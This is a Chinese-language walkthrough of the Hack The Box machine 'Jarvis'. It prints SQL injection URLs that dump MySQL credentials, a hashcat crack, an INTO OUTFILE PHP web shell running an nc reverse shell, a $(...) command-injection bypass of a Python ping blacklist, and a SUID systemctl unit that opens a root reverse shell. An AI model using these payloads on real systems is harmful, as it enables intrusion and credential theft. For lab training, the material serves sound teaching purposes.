Jarvis-htb-writeup

0x00 靶场技能介绍

章节技能：SQL注入、SQL注入读取数据库账号密码、SQL注入写shell、hashcat破解MySQL数据库密码、sudo提权、Python脚本分析、shell命令行拼接本地命令文件执行、suid提权

参考链接：https://www.jgeek.cn/article/120.html

参考链接：https://srmeirins.com/2023/08/09/jarvis-write-up/

参考链接：https://0xrick.github.io/hack-the-box/jarvis/

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.143

2、扫描下开放端口情况

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allport 10.10.10.143    
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 21:29 CST
Warning: 10.10.10.143 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.143
Host is up (0.29s latency).
Not shown: 65511 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
2333/tcp  filtered snapp
6524/tcp  filtered unknown
12446/tcp filtered unknown
19851/tcp filtered unknown
20528/tcp filtered unknown
21281/tcp filtered unknown
22255/tcp filtered unknown
22750/tcp filtered unknown
28608/tcp filtered unknown
36682/tcp filtered unknown
39808/tcp filtered unknown
40605/tcp filtered unknown
41865/tcp filtered unknown
45996/tcp filtered unknown
47026/tcp filtered unknown
48136/tcp filtered unknown
58527/tcp filtered unknown
60195/tcp filtered unknown
60739/tcp filtered unknown
63046/tcp filtered unknown
64334/tcp filtered unknown
64999/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 25.21 seconds


┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' allport | awk -F/ '{print $1}' | tr '\n' ',' 
22,80,64999,

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80,64999 -Pn --min-rate=10000 10.10.10.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 21:43 CST
Nmap scan report for 10.10.10.143
Host is up (0.29s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
64999/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds


┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn -sU --min-rate=10000 -oG allport1 10.10.10.143      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 21:48 CST
Warning: 10.10.10.143 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.143
Host is up (0.45s latency).
All 65535 scanned ports on 10.10.10.143 are in ignored states.
Not shown: 65459 open|filtered udp ports (no-response), 76 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 89.51 seconds

3、开放了2个WEB的服务，这里限度不常见的那个服务目录扫描下

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.143:64999/     
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.143_64999/__24-01-08_21-51-53.txt

Target: http://10.10.10.143:64999/

[21:51:53] Starting: 
[21:52:11] 403 -  280B  - /.ht_wsr.txt                                      
[21:52:11] 403 -  280B  - /.htaccess.bak1                                   
[21:52:11] 403 -  280B  - /.htaccess.orig                                   
[21:52:11] 403 -  280B  - /.htaccess.save
[21:52:11] 403 -  280B  - /.htaccess_extra                                  
[21:52:11] 403 -  280B  - /.htaccess.sample                                 
[21:52:11] 403 -  280B  - /.htaccess_orig
[21:52:11] 403 -  280B  - /.htaccess_sc
[21:52:11] 403 -  280B  - /.htaccessBAK
[21:52:11] 403 -  280B  - /.htaccessOLD
[21:52:11] 403 -  280B  - /.htaccessOLD2                                    
[21:52:11] 403 -  280B  - /.htm                                             
[21:52:11] 403 -  280B  - /.html
[21:52:11] 403 -  280B  - /.htpasswd_test                                   
[21:52:11] 403 -  280B  - /.httr-oauth                                      
[21:52:12] 403 -  280B  - /.htpasswds                                       
[21:52:15] 403 -  280B  - /.php                                             
[21:52:16] 403 -  280B  - /.php3                                            
[21:56:39] 403 -  280B  - /server-status/                                    
[21:56:39] 403 -  280B  - /server-status
                                                                              
Task Completed

4、查看下 64999 端口的服务，发现应该是存在频率限制的

5、查看80端口的服务，发现了一个域名信息，本地绑定了下

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.143 supersecurehotel.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.10.143 supersecurehotel.htb

6、通过对网站的简单枚举，发现当前网站存在SQL注入漏洞

http://10.10.10.143/room.php?cod=1%20and%201=1

http://10.10.10.143/room.php?cod=1%20and%201=2

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,2,3,4,5,6,7

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,@@version,3,4,5,6,7

# 常用方法

DBadmin@localhost
hotel

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,2,3,4,group_concat(table_name),6,7 from information_schema.tables where table_schema=0x686f74656c

room

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_name=0x726f6f6d

cod,name,price,descrip,star,image,mini

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,2,3,4,name,6,7 from room

Superior Family Room

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,2,3,4,group_concat(schema_name),6,7 from information_schema.schemata

hotel,information_schema,mysql,performance_schema

7、这里直接获取下数据自身的账号密码，下面的查询是一个固定的数据库格式，MySQL固定的。

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,2,3,4,concat(host,0x3a,user,0x3a,password),6,7 from mysql.user

localhost:DBadmin:*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0

8、下面使用 hashcat 破解下数据库的密码

shiyan@InfoSec hashcat-6.2.6 % sudo hashcat -a 0 -m 300 ./test/hashes ./dict-list/rockyou.txt
hashcat (v6.2.6) starting

* Device #2: Apple's OpenCL drivers (GPU) are known to be unreliable.
             You have been warned.

METAL API (Metal 341.29)
========================
* Device #1: Apple M2 Pro, 5408/10922 MB, 19MCU

OpenCL API (OpenCL 1.2 (Sep 30 2023 03:48:09)) - Platform #1 [Apple]
====================================================================
* Device #2: Apple M2 Pro, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 100c

Host memory required for this attack: 333 MB

Dictionary cache built:
* Filename..: ./dict-list/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs

2d2b7a5e4e637b8fba1d17f40318f277d29964d0:imissyou         
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 300 (MySQL4.1/MySQL5)
Hash.Target......: 2d2b7a5e4e637b8fba1d17f40318f277d29964d0
Time.Started.....: Mon Jan  8 22:46:46 2024 (0 secs)
Time.Estimated...: Mon Jan  8 22:46:46 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (./dict-list/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 66441.7 kH/s (7.89ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1245184/14344385 (8.68%)
Rejected.........: 0/1245184 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> swetieko
Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0%
Hardware.Mon.#1..: Util: 75%

Started: Mon Jan  8 22:46:39 2024
Stopped: Mon Jan  8 22:46:47 2024
shiyan@InfoSec hashcat-6.2.6 % 

9、这一块忘了扫描根目录了，其实这里是可以发现 phpmyadmin 目录的

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.143       
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.143/_24-01-08_22-20-05.txt

Target: http://10.10.10.143/

[22:20:05] Starting: 
[22:20:12] 301 -  309B  - /js  ->  http://10.10.10.143/js/                  
[22:20:21] 403 -  277B  - /.ht_wsr.txt                                      
[22:20:21] 403 -  277B  - /.htaccess.orig                                   
[22:20:21] 403 -  277B  - /.htaccess.bak1                                   
[22:20:22] 403 -  277B  - /.htaccess.sample
[22:20:22] 403 -  277B  - /.htaccess_orig
[22:20:22] 403 -  277B  - /.html                                            
[22:20:22] 403 -  277B  - /.htm
[22:20:22] 403 -  277B  - /.htaccess.save
[22:20:22] 403 -  277B  - /.htaccess_extra                                  
[22:20:22] 403 -  277B  - /.htaccessBAK                                     
[22:20:22] 403 -  277B  - /.htpasswds                                       
[22:20:22] 403 -  277B  - /.htpasswd_test                                   
[22:20:22] 403 -  277B  - /.httr-oauth                                      
[22:20:22] 403 -  277B  - /.htaccess_sc
[22:20:22] 403 -  277B  - /.htaccessOLD2                                    
[22:20:22] 403 -  277B  - /.htaccessOLD                                     
[22:20:26] 403 -  277B  - /.php3                                            
[22:20:26] 403 -  277B  - /.php                                             
[22:21:40] 301 -  310B  - /css  ->  http://10.10.10.143/css/                
[22:21:52] 200 -  755B  - /footer.php                                       
[22:21:52] 301 -  312B  - /fonts  ->  http://10.10.10.143/fonts/
[22:22:00] 301 -  313B  - /images  ->  http://10.10.10.143/images/          
[22:22:00] 200 -  814B  - /images/
[22:22:04] 200 -  676B  - /js/                                              
[22:22:28] 301 -  317B  - /phpmyadmin  ->  http://10.10.10.143/phpmyadmin/  
[22:22:31] 200 -    1KB - /phpmyadmin/README                                
[22:22:31] 200 -    4KB - /phpmyadmin/index.php                             
[22:22:31] 200 -    3KB - /phpmyadmin/doc/html/index.html
[22:22:31] 200 -   19KB - /phpmyadmin/ChangeLog
[22:22:31] 200 -    4KB - /phpmyadmin/                                      
[22:22:44] 403 -  277B  - /server-status/                                   
[22:22:44] 403 -  277B  - /server-status
                                                                             
Task Completed

10、然后使用上， 破解出的密码，可以成功登录上去

http://10.10.10.143/phpmyadmin/

DBadmin:imissyou

11、由于是靶机，所以这里直接SQL注入写shell了

http://10.10.10.143/room.php?cod=-1 union select 1,2,"<?php system('nc -e /bin/bash 10.10.14.5 443'); ?>",4,5,6,7 into outfile "/var/www/html/reverse.php"-- -

http://10.10.10.143/reverse.php

12、获取到初始的shell权限

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.143] 54230
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jarvis:/var/www/html$ 

13、发现当前用户拥有sudo -l 的权限

www-data@jarvis:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
www-data@jarvis:/var/www/html$

14、分析该脚本文件

www-data@jarvis:/var/www/html$ ls -la /var/www/Admin-Utilities/simpler.py
ls -la /var/www/Admin-Utilities/simpler.py
-rwxr--r-- 1 pepper pepper 4587 Mar  4  2019 /var/www/Admin-Utilities/simpler.py
www-data@jarvis:/var/www/html$ cat /var/www/Admin-Utilities/simpler.py
cat /var/www/Admin-Utilities/simpler.py
#!/usr/bin/env python3
from datetime import datetime
import sys
import os
from os import listdir
import re

def show_help():
    message='''
********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage:  python3 simpler.py [options]

Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP
    '''
    print(message)

def show_header():
    print('''***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************
''')

def show_statistics():
    path = '/home/pepper/Web/Logs/'
    print('Statistics\n-----------')
    listed_files = listdir(path)
    count = len(listed_files)
    print('Number of Attackers: ' + str(count))
    level_1 = 0
    dat = datetime(1, 1, 1)
    ip_list = []
    reks = []
    ip = ''
    req = ''
    rek = ''
    for i in listed_files:
        f = open(path + i, 'r')
        lines = f.readlines()
        level2, rek = get_max_level(lines)
        fecha, requ = date_to_num(lines)
        ip = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if fecha > dat:
            dat = fecha
            req = requ
            ip2 = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if int(level2) > int(level_1):
            level_1 = level2
            ip_list = [ip]
            reks=[rek]
        elif int(level2) == int(level_1):
            ip_list.append(ip)
            reks.append(rek)
        f.close()

    print('Most Risky:')
    if len(ip_list) > 1:
        print('More than 1 ip found')
    cont = 0
    for i in ip_list:
        print('    ' + i + ' - Attack Level : ' + level_1 + ' Request: ' + reks[cont])
        cont = cont + 1

    print('Most Recent: ' + ip2 + ' --> ' + str(dat) + ' ' + req)

def list_ip():
    print('Attackers\n-----------')
    path = '/home/pepper/Web/Logs/'
    listed_files = listdir(path)
    for i in listed_files:
        f = open(path + i,'r')
        lines = f.readlines()
        level,req = get_max_level(lines)
        print(i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3] + ' - Attack Level : ' + level)
        f.close()

def date_to_num(lines):
    dat = datetime(1,1,1)
    ip = ''
    req=''
    for i in lines:
        if 'Level' in i:
            fecha=(i.split(' ')[6] + ' ' + i.split(' ')[7]).split('\n')[0]
            regex = '(\d+)-(.*)-(\d+)(.*)'
            logEx=re.match(regex, fecha).groups()
            mes = to_dict(logEx[1])
            fecha = logEx[0] + '-' + mes + '-' + logEx[2] + ' ' + logEx[3]
            fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')
            if fecha > dat:
                dat = fecha
                req = i.split(' ')[8] + ' ' + i.split(' ')[9] + ' ' + i.split(' ')[10]
    return dat, req

def to_dict(name):
    month_dict = {'Jan':'01','Feb':'02','Mar':'03','Apr':'04', 'May':'05', 'Jun':'06','Jul':'07','Aug':'08','Sep':'09','Oct':'10','Nov':'11','Dec':'12'}
    return month_dict[name]

def get_max_level(lines):
    level=0
    for j in lines:
        if 'Level' in j:
            if int(j.split(' ')[4]) > int(level):
                level = j.split(' ')[4]
                req=j.split(' ')[8] + ' ' + j.split(' ')[9] + ' ' + j.split(' ')[10]
    return level, req

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

if __name__ == '__main__':
    show_header()
    if len(sys.argv) != 2:
        show_help()
        exit()
    if sys.argv[1] == '-h' or sys.argv[1] == '--help':
        show_help()
        exit()
    elif sys.argv[1] == '-s':
        show_statistics()
        exit()
    elif sys.argv[1] == '-l':
        list_ip()
        exit()
    elif sys.argv[1] == '-p':
        exec_ping()
        exit()
    else:
        show_help()
        exit()
www-data@jarvis:/var/www/html$

15、关键代码在 exec_ping 方法中：

当用 sudo 运行脚本并附带 -p 参数后，会接收用户传递的字符串
如果字符串内容含有黑名单内容则终止，否则就进行字符串拼接并执行系统 shell
因为使用的黑明单过滤，所以能很容易的发现 bypass 的方式，这里遗漏了 $、(、) 符号的组合使用。例如：

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

echo -e '#!/bin/bash\n\nbash -c "sh -i >& /dev/tcp/10.10.14.5/4333 0>&1"' > /tmp/shell
chmod +x /tmp/shell

接着在 sudo 运行脚本并带上 -p 参数，输入 127.0.0.1$(/tmp/shell) 成功得到 pepper 用户的 shell

16、开始漏洞利用，获取第一个user的权限

www-data@jarvis:/var/www/html$ echo -e '#!/bin/bash\n\nbash -c "sh -i >& /dev/tcp/10.10.14.5/4333 0>&1"' > /tmp/shell
< -i >& /dev/tcp/10.10.14.5/4333 0>&1"' > /tmp/shell
www-data@jarvis:/var/www/html$ chmod +x /tmp/shell
chmod +x /tmp/shell
www-data@jarvis:/var/www/html$ 

www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
<do -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************

Enter an IP: Enter an IP: 127.0.0.1$(/tmp/shell)
Enter an IP: 127.0.0.1$(/tmp/shell)

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 4333
listening on [any] 4333 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.143] 36306
$ id
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
pepper@jarvis:/var/www/html$ 

17、获取下第一个user的flag信息

pepper@jarvis:/var/www/html$ cd ~
cd ~
pepper@jarvis:~$ ls
ls
Web  user.txt
pepper@jarvis:~$ cat user.txt
cat user.txt
196344f574503a6a783d69089c15efc3
pepper@jarvis:~$ 

0x02 系统权限获取

18、通过命令查看 suid 的程序

pepper@jarvis:~$ find / -perm -4000 2>/dev/null 
find / -perm -4000 2>/dev/null 
/bin/fusermount
/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
pepper@jarvis:~$ ls -la /bin/systemctl
ls -la /bin/systemctl
-rwsr-x--- 1 root pepper 174520 Jun 29  2022 /bin/systemctl
pepper@jarvis:~$ 

19、这里参考 gtfobins 进行漏洞利用

https://gtfobins.github.io/gtfobins/systemctl/#suid

echo -e '[Service]\nType=oneshot\nExecStart=/bin/bash -c "nc -e /bin/bash 10.10.14.5 10086"\n[Install]\nWantedBy=multi-user.target' > /dev/shm/srmeirins.service

systemctl link /dev/shm/srmeirins.service

#Nos ponemos a la escucha en el equipo local --> nc -lvnp 443

systemctl enable --now srmeirins

20、成功获取到root的权限

pepper@jarvis:~$ echo -e '[Service]\nType=oneshot\nExecStart=/bin/bash -c "nc -e /bin/bash 10.10.14.5 10086"\n[Install]\nWantedBy=multi-user.target' > /dev/shm/srmeirins.service
<dBy=multi-user.target' > /dev/shm/srmeirins.service
pepper@jarvis:~$ systemctl link /dev/shm/srmeirins.service
systemctl link /dev/shm/srmeirins.service
Created symlink /etc/systemd/system/srmeirins.service -> /dev/shm/srmeirins.service.
pepper@jarvis:~$ systemctl enable --now srmeirins
systemctl enable --now srmeirins
Created symlink /etc/systemd/system/multi-user.target.wants/srmeirins.service -> /dev/shm/srmeirins.service.

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.143] 32950
id
uid=0(root) gid=0(root) groups=0(root)

21、获取下最终的root的flag信息

python3 -c 'import pty;pty.spawn("/bin/bash")'
root@jarvis:/# 

root@jarvis:/# cat /root/root.txt       
cat /root/root.txt
9ebe5b67311067357584f21ccf1641f2
root@jarvis:/# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/194